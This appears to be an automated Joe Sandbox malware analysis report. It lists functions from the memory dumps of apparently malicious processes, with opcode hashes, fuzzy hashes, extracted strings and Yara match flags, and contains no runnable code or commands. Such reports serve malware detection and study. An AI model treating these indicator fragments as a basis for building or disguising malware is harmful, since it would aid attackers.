                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f9362f415fb383a38b28dd5fcc239714f39f6cbec9d7e0ec492675f4129432e4
                                                        • Instruction ID: e3c0f023725922a206ae8b394d79783418174d1d430981880d8a1b3d5c88a48b
                                                        • Opcode Fuzzy Hash: f9362f415fb383a38b28dd5fcc239714f39f6cbec9d7e0ec492675f4129432e4
                                                        • Instruction Fuzzy Hash: F990023561180542D51171595904646004697E0301F55D422A042459DDC77489E1A621
                                                        Function 013F2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction ID: faa3bc59d46e19ae98341e378f68584edea85760f0a4875d322f4af6ff072fb0
                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction Fuzzy Hash:
                                                        Function 013F2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 1244f56d97af716811ddd555e34c987ca927a22b16d8ce629dd22015651e8d28
                                                        • Instruction ID: a266b93fb5b0c99f81f6d290c39fc841dc06b73669f5991b5f6ee6d91bda4f52
                                                        • Opcode Fuzzy Hash: 1244f56d97af716811ddd555e34c987ca927a22b16d8ce629dd22015651e8d28
                                                        • Instruction Fuzzy Hash: 8651E6B6A00256BFCB11DFAD889097FFBB8BB08244B54826EF565D7A41D334DE5087E0
                                                        Function 01462410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 05e39ef9031ce2fec27fb0bf44520a13806ded3187d72957e25f11329f7f395a
                                                        • Instruction ID: f8efc385ed3ec2e773829c9eb5b5935babcb0e74d25c0de1713a568a52301c8e
                                                        • Opcode Fuzzy Hash: 05e39ef9031ce2fec27fb0bf44520a13806ded3187d72957e25f11329f7f395a
                                                        • Instruction Fuzzy Hash: 25510371A00646BACB30DF9DC990D7FBBBCEB44208B40842BE4D6D7791E6B4DA408761
                                                        Function 013E7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01424655
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014246FC
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01424787
                                                        • Execute=1, xrefs: 01424713
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01424742
                                                        • ExecuteOptions, xrefs: 014246A0
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01424725
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        • Opcode ID: f5720daf4d80a7e41b5c1d3c7c388ea0e12336b8aa7608e19e6113d068406302
                                                        • Instruction ID: 11faaafb5c500d36b2864bd0e7888c6171748580a3c3028787132119c45e0d9f
                                                        • Opcode Fuzzy Hash: f5720daf4d80a7e41b5c1d3c7c388ea0e12336b8aa7608e19e6113d068406302
                                                        • Instruction Fuzzy Hash: 46512D3160032ABAEF21ABA9DC89FFA77E8EF5431CF44009DD605AB1D1D7719A458F90
                                                        Function 013FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-$0$0
                                                        • API String ID: 1302938615-699404926
                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                        • Instruction ID: 9bb8804a780b6066669730f2c663ed6393cb39a9b6b08c9fe89c0bd8fbe894c0
                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                        • Instruction Fuzzy Hash: 6281D2B0E052498EEF258E6CC8517FEFFB6AF85368F18411DDA61A7299C7348840CB61
                                                        Function 014620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$[$]:%u
                                                        • API String ID: 48624451-2819853543
                                                        • Opcode ID: e4a2608e1c4d5db309166c185c0dac4f8c2b2a2bf2d8e286e7055d29c967d518
                                                        • Instruction ID: f5521f767d0f0a8d1699aebff552ee0d934ce1b637e14d4db1f6d31afeb049e0
                                                        • Opcode Fuzzy Hash: e4a2608e1c4d5db309166c185c0dac4f8c2b2a2bf2d8e286e7055d29c967d518
                                                        • Instruction Fuzzy Hash: 4E2133BAE00119ABDB11DF69D840EFF7BECEF54658F44012AEA05E3254E771DA018BA1
                                                        Function 013DF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014202E7
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014202BD
                                                        • RTL: Re-Waiting, xrefs: 0142031E
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                        • API String ID: 0-2474120054
                                                        • Opcode ID: 29e83d5a3b1d43d2b23175c35cfb8ee0c85cf13ac9c3b174e13404390dc6151f
                                                        • Instruction ID: 83de9d0a39da752d50b8821818be2ffe1f7f1a867784b3b1dee619b13df22e98
                                                        • Opcode Fuzzy Hash: 29e83d5a3b1d43d2b23175c35cfb8ee0c85cf13ac9c3b174e13404390dc6151f
                                                        • Instruction Fuzzy Hash: 78E1CE316047419FD725CF28D884B2ABBE4BB84328F140A1EF5A6CB7E1D774D986CB52
                                                        Function 013EBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01427B7F
                                                        • RTL: Re-Waiting, xrefs: 01427BAC
                                                        • RTL: Resource at %p, xrefs: 01427B8E
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 0-871070163
                                                        • Opcode ID: 06453a71e0cc922cf444c97b90c55802d08b7bc534851c5eb2f5c55e57faf66c
                                                        • Instruction ID: c1ac3d1430c5b654c7c720bd93a52d2b674140b5de215feed1962bd9980d021c
                                                        • Opcode Fuzzy Hash: 06453a71e0cc922cf444c97b90c55802d08b7bc534851c5eb2f5c55e57faf66c
                                                        • Instruction Fuzzy Hash: 8C4125317007169FDB21CE29C840B27B7E5EF98715F000A1EFA5AD7790DB31E84A8B91
                                                        Function 013EB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0142728C
                                                        Strings
                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01427294
                                                        • RTL: Re-Waiting, xrefs: 014272C1
                                                        • RTL: Resource at %p, xrefs: 014272A3
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-605551621
                                                        • Opcode ID: 999527f9837cf713b0891e26e501961bb2672c17ed5e57845da7b24f36e06e2c
                                                        • Instruction ID: 7054f2fa225822dde4af37501e61fad5d78da4e837064f67b4bfdc68c9880aaa
                                                        • Opcode Fuzzy Hash: 999527f9837cf713b0891e26e501961bb2672c17ed5e57845da7b24f36e06e2c
                                                        • Instruction Fuzzy Hash: E7411031600326ABD722CF29CC41B26B7A5FBA5715F10061AF945EB3A0DB31E8528BE1
                                                        Function 01462300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: 33e3c4aa68d691d2a633beebf391008f02696f59e6037772c1e34b2382ef84f3
                                                        • Instruction ID: 29cdd1b7ad2176b50c8a595699087541749713fb89703c1eeb08ef207d646bb7
                                                        • Opcode Fuzzy Hash: 33e3c4aa68d691d2a633beebf391008f02696f59e6037772c1e34b2382ef84f3
                                                        • Instruction Fuzzy Hash: 85318472A00219AFDB60DE3DCC40FEF77BCEB54654F84055BE949E3250EB709A848BA1
                                                        Function 013F7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-
                                                        • API String ID: 1302938615-2137968064
                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                        • Instruction ID: b741cee594843c46f6816475e7e011b76d5b36f70382c164fa2da48695b9921c
                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                        • Instruction Fuzzy Hash: 1D91B171E0030A9BEF24DF6DC881ABEBBA5EF44328F54461EEB65E72C0D73099458B11
                                                        Function 013B9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$@
                                                        • API String ID: 0-1194432280
                                                        • Opcode ID: 09ded741acb4b3bbb7aaac159a7e0f6777b34abdd2358d0b194b68fa15e537c5
                                                        • Instruction ID: 4a2408a5372249086fbc920484b452fca8ab5367028de4c8a4f784e2cdf99e16
                                                        • Opcode Fuzzy Hash: 09ded741acb4b3bbb7aaac159a7e0f6777b34abdd2358d0b194b68fa15e537c5
                                                        • Instruction Fuzzy Hash: 9A811B71D002699BDB359B54CC44BEEBBB4AF08714F1041EAEA1DB7690E7705E85CFA0
                                                        Function 0143CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0143CFBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: CallFilterFunc@8
                                                        • String ID: @$@4Cw@4Cw
                                                        • API String ID: 4062629308-3101775584
                                                        • Opcode ID: 6001caa91a27a8e3b0280732b7e7341388d8d3f73a1963e15bc0c2447d547301
                                                        • Instruction ID: 05a6fb899e12bb1e458dccec4419dd2104abdee034f94a9747c970772526e518
                                                        • Opcode Fuzzy Hash: 6001caa91a27a8e3b0280732b7e7341388d8d3f73a1963e15bc0c2447d547301
                                                        • Instruction Fuzzy Hash: C0419EB1900215DFCB219FA9C840AAEFBB8FF99B58F51402FE904DB264E734D801CB61

                                                        Executed Functions

                                                        Function 04077025 Relevance: .1, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c7628efe74a26828ca57720f1b355a266732c1ecc3df20125fa4e14f020b909f
                                                        • Instruction ID: b10f907e5ded0c161f03ae7e72696ef5a0bf5cecc4e51ebb59df9e305d195f1c
                                                        • Opcode Fuzzy Hash: c7628efe74a26828ca57720f1b355a266732c1ecc3df20125fa4e14f020b909f
                                                        • Instruction Fuzzy Hash: 8E31D511A583F14ED30E836D08B9A75AFC18F5724174EC2EEDADA6F2F3C4848419D3A5
                                                        Function 04076292 Relevance: 60.6, Strings: 48, Instructions: 587COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: {$#$$Z$%?$&-$'f$'o$/Z$1b$66$7O$;)$=Z$=k$?\$@-$B]$Dd$Ey$H1$NA$O$Qd$Qh$T&$V$V/$Z.$[h$^K$_N$`U$`a$c%$d$g@$j$l$q)$qb$u$u$w"$w5$~;$W$e$s
                                                        • API String ID: 0-1375048673
                                                        • Opcode ID: 8eb2207ac221af48023aee3f930bbbcc3d13958e9f9cb6075b88a2aed5f76d02
                                                        • Instruction ID: a3e3ab6ed69e42105c6cfeab4d00547ac9d84f3e5e62c5d76e5d2f28457ecfaf
                                                        • Opcode Fuzzy Hash: 8eb2207ac221af48023aee3f930bbbcc3d13958e9f9cb6075b88a2aed5f76d02
                                                        • Instruction Fuzzy Hash: 39729BB0D05629CBEB65CF45C8987DDBBB1BB48308F1085D9C10E7B290D7BA6A88DF45
                                                        Function 04083E4B Relevance: 6.4, Strings: 5, Instructions: 148COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$O$S$\$s
                                                        • API String ID: 0-3854637164
                                                        • Opcode ID: aa6c9d7937143d569e0f548cfa3c1a0e0d8bc48a816d17ea97ecee67788804a5
                                                        • Instruction ID: 83c62c80a67b4f3954623f6335eb0f5e8b5385ea0bd6aac4ae9ef7103b4a5b39
                                                        • Opcode Fuzzy Hash: aa6c9d7937143d569e0f548cfa3c1a0e0d8bc48a816d17ea97ecee67788804a5
                                                        • Instruction Fuzzy Hash: 9441F772D00119BBDB10EF94DD48EEAB3F8EB84718F008559ED08A7101E776BA549BE1
                                                        Function 040919B2 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "
                                                        • API String ID: 0-3847333454
                                                        • Opcode ID: 0818a829163c7660c2f5b42bf689f5b1fd462d0a620ac56f005babb2b4334f58
                                                        • Instruction ID: 587e7aacc2ee2c230b00574496ef8261af7d5149cf907f4a246497e4c7a85d8b
                                                        • Opcode Fuzzy Hash: 0818a829163c7660c2f5b42bf689f5b1fd462d0a620ac56f005babb2b4334f58
                                                        • Instruction Fuzzy Hash: 9E1100B6D0121CAF9B40DFE9DC419EEBBF8EF58214F04456AE91AF7200E7745A048BA1
                                                        Function 040906F2 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: f?
                                                        • API String ID: 0-3289969635
                                                        • Opcode ID: 0c350a499c5a2e42597a84862848742d39529a815448d8b8c4f2502d582a421f
                                                        • Instruction ID: fe486e745d3d39f029bc2fe3811aa1a8e103d69babcdc7c418e514cec6979430
                                                        • Opcode Fuzzy Hash: 0c350a499c5a2e42597a84862848742d39529a815448d8b8c4f2502d582a421f
                                                        • Instruction Fuzzy Hash: 3201E9B2D11219AFDB40DFE8C9409EEBBF9BF18214F14456AD91AF3200E7746B048BA1
                                                        Function 0406FB93 Relevance: .2, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 778a32a4fe6b0a8f8dd755a4ef5b18bc08a0d387f1e379a810c02b2ac3240d8d
                                                        • Instruction ID: c5c88ba2fa918b23abbeba298b4cf6affeeafd693d97a963eb34a4e8b402bdf7
                                                        • Opcode Fuzzy Hash: 778a32a4fe6b0a8f8dd755a4ef5b18bc08a0d387f1e379a810c02b2ac3240d8d
                                                        • Instruction Fuzzy Hash: F2513DB1D11219AFDB14CF99D881AEEBBFCFB49720F10415AF919E6240E771A6418BA0
                                                        Function 0406FD64 Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: af692bea39476732a1cb8c8406f916c5d794fd13f29e177553aba5a5cff45f4a
                                                        • Instruction ID: 8a65fd40fd06bffa0a6fd1bf4d2345f37c7c13abeb75b1ba8cbc29348656275d
                                                        • Opcode Fuzzy Hash: af692bea39476732a1cb8c8406f916c5d794fd13f29e177553aba5a5cff45f4a
                                                        • Instruction Fuzzy Hash: 6C21AD32419B578FCB558F39D4511C9B7A2EF813A8724164DD4976F082C732B45BC680
                                                        Function 04093A02 Relevance: .1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4be5679cea006674c570a5ef96b56ff4a39c967c6235132409dbc82a723dbfba
                                                        • Instruction ID: c8b1020f9a5ab1d98075d1c43a22b379326f0990a24baef14e61c24138eed641
                                                        • Opcode Fuzzy Hash: 4be5679cea006674c570a5ef96b56ff4a39c967c6235132409dbc82a723dbfba
                                                        • Instruction Fuzzy Hash: F321D6B5A00249ABDB14DF99DC81EEB77F9AF89304F008519FD49A7240D674BC118BA5
                                                        Function 04083C92 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 810e77b3d07793d0af76e8f84bf2adf8f73394cd5d2ce486dae46894da0ccb11
                                                        • Instruction ID: b4c466692e5fa28032315bdc7047d63335ee4b1b5cae84941afcb633111efa18
                                                        • Opcode Fuzzy Hash: 810e77b3d07793d0af76e8f84bf2adf8f73394cd5d2ce486dae46894da0ccb11
                                                        • Instruction Fuzzy Hash: 0511A3B23802057BF720AE558C42FAB33AD9BD5B58F244005FF04BA1C1D6B5F91257B8
                                                        Function 040942E2 Relevance: .1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 327e5875283fe8e604ee6d109436041f241f216616857bde79391b8501f24681
                                                        • Instruction ID: 2608c0eaf33c90397c810705b407a95eec7c8157abf4a089b9e9ea36355255a4
                                                        • Opcode Fuzzy Hash: 327e5875283fe8e604ee6d109436041f241f216616857bde79391b8501f24681
                                                        • Instruction Fuzzy Hash: B62118B1A00249ABEB24DF99DC41EEFB7B8EF89704F408519FD19A7240D770BD118BA5
                                                        Function 04083DAF Relevance: .1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 202fe963e5f92094884c755f517261711bd79e7e737521c6d7a7cec346043457
                                                        • Instruction ID: 4981e6a59f2ae352792edaafda12ca490ebf7ed20bf10b6c02ab4ec3f606404e
                                                        • Opcode Fuzzy Hash: 202fe963e5f92094884c755f517261711bd79e7e737521c6d7a7cec346043457
                                                        • Instruction Fuzzy Hash: 3D1151B1D11218ABDB10DFA5D941AAEBBB8EF48A14F10816EEC09E7240E375A6509B91
                                                        Function 04093822 Relevance: .1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5e0101f6f56d23fd51360bf27a2bf8373062c326cd9b1c2d08a501ede4f1fca6
                                                        • Instruction ID: 8fdab4ff5594b94ded0c9d9d58c50b1abcaa3b4d4e807ce22f96689fa90b383d
                                                        • Opcode Fuzzy Hash: 5e0101f6f56d23fd51360bf27a2bf8373062c326cd9b1c2d08a501ede4f1fca6
                                                        • Instruction Fuzzy Hash: AE115171A00254BBEB24EFA99C41FEB77ACEF86714F408509FE55A6280D7707D118BA1
                                                        Function 040936C2 Relevance: .1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e354fb2af2320f885dfc9e8d8139e9ca71be24ef720bb591e6bd7c54d75396ed
                                                        • Instruction ID: 00954eea597251dcccc749fef08a74a7eb498f112adf1f2971cdce847976b372
                                                        • Opcode Fuzzy Hash: e354fb2af2320f885dfc9e8d8139e9ca71be24ef720bb591e6bd7c54d75396ed
                                                        • Instruction Fuzzy Hash: 8E113D716002546BEB20EA99DC41FABB7A8EF85704F408509FD15A6240D774B9118BA1
                                                        Function 04090782 Relevance: .1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
